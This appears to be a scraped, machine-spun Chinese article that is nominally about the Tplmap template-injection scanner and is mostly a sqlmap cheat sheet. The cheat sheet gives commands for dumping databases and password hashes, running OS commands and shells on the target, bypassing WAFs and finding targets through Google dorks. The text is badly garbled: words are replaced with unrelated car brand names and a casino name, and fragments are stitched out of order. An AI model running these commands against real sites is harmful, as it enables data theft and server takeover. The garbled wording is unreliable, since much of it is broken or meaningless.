原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

 

实践该命令后,该工具会针对四个插件测量试验目的URubiconL以搜寻代码注入机遇。

Sqlmap:

  • 通常注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=1” –dbs   查看全体数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包举办自动post注入(也得以进来http尾部的轻便地点注入,只要在注入地点步入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动选拔sqlmap默许选项卡塔尔国

  • -p  (参数接受卡塔尔(英语:State of Qatar)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为常规扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出内定表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*极目远望注入点*/

sqlmap.py -u “url” –dbs
/*列出全体数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出近些日子客户*/

sqlmap.py -u “url” –tables -D
“当前数据库名” /*拆除与搬迁当前数码库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数量库名” /*拆除与搬迁内定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*环顾注入点*/

sqlmap.py -u “url” –dbs
/*列出富有数据库*/

sqlmap.py -u “url” –current-db
/*列出脚下数据库*/

sqlmap.py -u “url” –current-user
/*列出如今客户*/

sqlmap.py -u “url” –tables -D
“当前数量库名” /*拆解当前多少库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前多少库名” /*拆解内定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSE君越VEENVISION操作和MYSQL是同豆蔻梢头的!!!司空眼惯的两种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp可能www.xxx.com/php” –cookie “参数名如id=1” –level
2/*level为晋级权限*/

什么样数据库就依照上面的数据库加上cookie语句拆解就能够了

5.POST注入:

抓包保存到SQLMAP目录下.txt的公文然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文本名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

8.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

有关tamper脚本详细表达在本博客中有,链接为:

9.将注入语句插入到钦定地点:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

些微网址是选拔伪静态的页面使用SQLMAP的平凡注入是可怜的,所以SQLMAP提供了”*”参数将SQL语句插入内定地方,日常用来伪静态注入。

在选拔HTTP注入时利用-r参数也得以直接在文书中加多*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

11.接纳Google语法寻觅注入(Googlehack卡塔尔(قطر‎:

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻觅语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 呈现程序的版本号并脱离

-h, –help 呈现此协理新闻并脱离

-v VEENVISIONDOSS 详细等级:0-6(默感觉1)

Target(目标):

以下起码须要安装当中七个筛选,设置指标UMuranoL。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日志中解析指标。

-r REQUESTFILE
从一个文件中载入HTTP供给。

-g GOOGLEDO揽胜K 管理谷歌dork的结果作为对象U奥迪Q5L。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

那一个接受能够用来钦定如何连接到目的UKugaL。

–data=DATA 通过POST发送的数量字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode U福睿斯L
编码生成的cookie注入

–drop-set-cookie 忽视响应的Set –
Cookie头消息

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADEPAJEROS
换行分开,参加别的的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM卡塔尔(قطر‎

–auth-cred=ACRED
HTTP身份验证凭据(客商名:密码)

–auth-cert=ACERT
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到对象UMuranoL

–proxy-cred=PCRED
HTTP代理身份验证凭据(客户名:密码)

–ignore-proxy 忽视系统暗许的HTTP代理

–delay=DELAY
在各样HTTP乞请之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的年月(默以为30秒)

–retries=RETRIES
连接超时后再行连接的时间(默许3)

–scope=SCOPE
从所提供的代办日志中过滤器指标的正则表达式

–safe-url=SAFUMuranoL
在测验进程中平时访问的url地址

–safe-freq=SAFREQ
一遍访谈之间测量试验央求,给出安全的U昂CoraL

Optimization(优化):

那个选拔可用于优化SqlMap的习性。

-o 开启全部优化按钮

–predict-output 预测平淡无奇的询问输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从未有实际的HTTP响应体中查找页面长度

–threads=THREADS
最大的HTTP(S)央浼并发量(默以为1)

Injection(注入):

那些选用能够用来钦定测试哪些参数,
提供自定义的注入payloads和可选点窜脚本。

-p TESTPARAMETE奥迪Q5 可测量试验的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为这几个值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPE奇骏使用给定的本子(S)点窜注入数据

Detection(检测):

这么些选取能够用来钦命在SQL盲注时怎么样解析和相比较HTTP响应页面包车型客车内容。

–level=LEVEL
实行测量试验的等第(1-5,私下认可为1)

–risk=TiguanISK
试行测验的风险(0-3,默以为1)

–string=STMuranoING
查询时有效时在页面相称字符串

–regexp=REGEXP
查询时有效时在页面相称正则表明式

–text-only 仅依据在文件内容相比网页

Techniques(技巧):

那一个接收可用以调治具体的SQL注入测量检验。

–technique=TECH
SQL注入本事测量检验(默许BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(默以为5秒)

–union-cols=UCOLS
定列范围用于测量试验UNION查询注入

–union-char=UCHA奔驰G级用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
实行检查布满的DBMS版本指纹

Enumeration(枚举):

这一个选用能够用来列举后端数据库管理体系的音讯、表中的结构和数量。此外,您还能运营您本人

的SQL语句。

-b, –banner
检索数据库管理体系的标记

–current-user
检索数据库处理系列当下客商

–current-db
检索数据库管理系列当下数据库

–is-dba 检查实验DBMS当前客户是还是不是DBA

–users 枚举数据库管理体系客户

–passwords
枚举数据库管理连串顾客密码哈希

–privileges
枚举数据库管理体系客户的权柄

–roles 枚举数据库管理种类客商的剧中人物

–dbs 枚举数据库管理类别数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理种类的数据库中的表项

–dump-all
转储全部的DBMS数据库表中的条文

–search
找寻列(S),表(S)和/或数据库名称(S)

-D DB 要进行枚举的数量库名

-T TBL 要扩充枚举的数额库表

-C COL 要扩充枚举的多寡库列

-U USECR-V 用来进展枚举的数据库客商

–exclude-sysdbs
枚举表时解除系统数据库

–start=LIMITSTART
第三个查询输出进入检索

–stop=LIMITSTOP
最终查询的输出步入检索

–first=FI路虎极光STCHASportage第二个查询输出字的字符检索

–last=LASTCHAEscort最终查询的出口字字符检索

–sql-query=QUE凯雷德Y 要试行的SQL语句

–sql-shell 提醒人机联作式SQL的shell

Brute force(蛮力):

那些接纳能够被用来运营蛮力检查。

–common-tables 检查存在协同表

–common-columns 检查存在协同列

User-defined function
injection(客户自定义函数注入):

那些采纳能够用来创立客商自定义函数。

–udf-inject 注入客户自定义函数

–shared-lib=SHLIB 分享库之处路径

File system
access(访问文件系统):

那几个接受能够被用于访谈后端数据库管理系列的平底文件系统。

–file-read=GL450FILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库处理系统文件系统上的地点文件

–file-dest=DFILE
后端的数据库管理体系写入文件的相对路线

Operating system
access(操作系统访谈):

那些采取能够用于访问后端数据库管理系列的最底层操作系统。

 

–os-cmd=OSCMD 实行操作系统命令

–os-shell 人机联作式的操作系统的shell

–os-pwn 获取叁个OOB
shell,meterpreter或VNC

–os-smbrelay 生机勃勃键获取一个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进程缓冲区溢出利用

–priv-esc 数据库进度顾客权限升高

–msf-path=MSFPATH Metasploit Framework本地的安装路线

–tmp-path=TMPPATH
远程不常文件目录的相对路线

Windows注册表访谈:

那几个接收能够被用来访谈后端数据库管理种类Windows注册表。

–reg-read 读二个Windows注册表项值

–reg-add
写四个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows挂号表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

那么些选择能够用来设置某个雷同的行事参数。

-t TRAFFICFILE
记录全体HTTP流量到二个文本文件中

-s SESSIONFILE
保存和复苏检索会话文件的有所数据

–flush-session
刷新当前目的的对话文件

–fresh-queries
忽略在对话文件中存款和储蓄的查询结果

–eta 展现种种输出的猜度达到时间

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问顾客输入,使用具有暗中同意配置。

Miscellaneous(杂项):

–beep 开掘SQL注入时提醒

–check-payload
IDS对流入payloads的检验测量检验

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对目标U凯雷德L的辨析和测量试验情势

–gpage=GOOGLEPAGE
从内定的页码使用Googledork结果

–page-rank 谷歌dork结果显示网页排行(P瑞鹰)

–parse-errors
从响应页面深入解析数据库管理类其他错误新闻

–replicate
复制转储的数额到贰个sqlite3数据库

–tor 使用暗许的Tor(Vidalia/ Privoxy/
Polipo)代理地址

–wizard 给初级客户的粗略向导分界面

若果开采缺欠,该工具将出口有关指标中或然注入点的详细新闻。那个富含GET参数值(无论是id依然名称),模板引擎(比方Tornado),OS(比如Linux)和注入手艺(举例渲染,盲)。

金沙电子艺游9159 1

能够因而选择以下github链接从github存款和储蓄Cook隆该工具来安装Tplmap。

金沙电子艺游9159 2

金沙电子艺游9159 3

git clone

文章出处:latesthackingnews回来今日头条,查看越来越多

成家立业安装后,将引得路线改进为tplmap安装文件以运营tplmap.py。

-os -shell选项在对象操作系统上运行伪终端以实践所需的代码。